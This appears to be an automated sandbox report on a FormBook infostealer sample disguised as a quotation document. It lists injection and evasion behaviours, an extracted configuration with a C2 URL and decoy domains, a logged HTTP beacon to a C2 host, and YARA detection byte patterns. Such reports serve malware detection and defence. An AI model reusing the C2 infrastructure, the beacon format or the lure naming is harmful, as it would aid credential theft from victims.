Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTATION LIST FOR NEW ORDER.exe

Overview

General Information

Sample Name:QUOTATION LIST FOR NEW ORDER.exe
Analysis ID:458798
MD5:2a28a3e032a65c25b90f193621b623af
SHA1:019659bb43b5535a9684d9938aa73e98682b0a61
SHA256:317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION LIST FOR NEW ORDER.exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: 2A28A3E032A65C25B90F193621B623AF)
    • QUOTATION LIST FOR NEW ORDER.exe (PID: 4760 cmdline: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe MD5: 2A28A3E032A65C25B90F193621B623AF)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6056 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6068 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.appackersandmoversbengaluru.com/p4se/"], "decoy": ["weightlossforprofessionals.com", "talkotstopandshop.com", "everesttechsolutions.com", "garboarts.com", "esubastas-online.com", "electriclastmile.com", "tomio.tech", "jacoty.com", "knot-tied-up.com", "energychoicesim.com", "rocketcompaniessham.com", "madarasapattinam.com", "promosplace.com", "newstarchurch.com", "thesaleskitchen.com", "slingmodeinc.com", "jobresulthub.com", "pillclk.com", "shipu119.com", "sibalcar.com", "quotovate.com", "bluecoyotecontracting.com", "hc68kr.com", "laundry39.com", "vietthaivt.com", "ikonflorida.com", "xn--sm2b97e.com", "innovisional.co.uk", "spacecityscouples.com", "slmccallum.com", "hro41.com", "theyardcardzstore.com", "primewildlife.com", "xn--seranderturzm-ebc.com", "stilesandhansen.com", "bvlesty.com", "hejiayin.com", "philosophersdojo.com", "aworldofsofas.com", "itile.net", "unitronicdealers.com", "savasoguz.com", "magetu.info", "devgmor.com", "villasabai.com", "pipipenguin.com", "furnishessentials.com", "patchmonitoring.com", "michaelhumphriesrealestate.com", "pratikahealth.com", "caswellcu.com", "lakeportal.com", "weedyourmind.com", "cardamommm.com", "freshstartrestorationllcmd.com", "mastercardbhdleon.com", "ceramiccottageco.com", "magiczneszkielka.com", "casebookconnet.com", "recharge.directory", "phoneprivacyscreen.com", "mumbaindicator.com", "jumboprovacy.com", "streamerdojo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.appackersandmoversbengaluru.com/p4se/"], "decoy": ["weightlossforprofessionals.com", "talkotstopandshop.com", "everesttechsolutions.com", "garboarts.com", "esubastas-online.com", "electriclastmile.com", "tomio.tech", "jacoty.com", "knot-tied-up.com", "energychoicesim.com", "rocketcompaniessham.com", "madarasapattinam.com", "promosplace.com", "newstarchurch.com", "thesaleskitchen.com", "slingmodeinc.com", "jobresulthub.com", "pillclk.com", "shipu119.com", "sibalcar.com", "quotovate.com", "bluecoyotecontracting.com", "hc68kr.com", "laundry39.com", "vietthaivt.com", "ikonflorida.com", "xn--sm2b97e.com", "innovisional.co.uk", "spacecityscouples.com", "slmccallum.com", "hro41.com", "theyardcardzstore.com", "primewildlife.com", "xn--seranderturzm-ebc.com", "stilesandhansen.com", "bvlesty.com", "hejiayin.com", "philosophersdojo.com", "aworldofsofas.com", "itile.net", "unitronicdealers.com", "savasoguz.com", "magetu.info", "devgmor.com", "villasabai.com", "pipipenguin.com", "furnishessentials.com", "patchmonitoring.com", "michaelhumphriesrealestate.com", "pratikahealth.com", "caswellcu.com", "lakeportal.com", "weedyourmind.com", "cardamommm.com", "freshstartrestorationllcmd.com", "mastercardbhdleon.com", "ceramiccottageco.com", "magiczneszkielka.com", "casebookconnet.com", "recharge.directory", "phoneprivacyscreen.com", "mumbaindicator.com", "jumboprovacy.com", "streamerdojo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QUOTATION LIST FOR NEW ORDER.exeVirustotal: Detection: 61%Perma Link
          Source: QUOTATION LIST FOR NEW ORDER.exeMetadefender: Detection: 37%Perma Link
          Source: QUOTATION LIST FOR NEW ORDER.exeReversingLabs: Detection: 63%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: QUOTATION LIST FOR NEW ORDER.exeJoe Sandbox ML: detected
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 4x nop then pop ebx10_2_00406A9F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx12_2_03046A9F

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.appackersandmoversbengaluru.com/p4se/
          Source: global trafficHTTP traffic detected: GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1Host: www.everesttechsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
          Source: global trafficHTTP traffic detected: GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1Host: www.everesttechsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.everesttechsolutions.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-sQE1s/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comh-s
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers6M
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersGN
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com9
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTFk
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comY
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comldF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como8
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comto
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/(
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmO;
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/N
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/(
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/xS
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comslnt
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dej
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
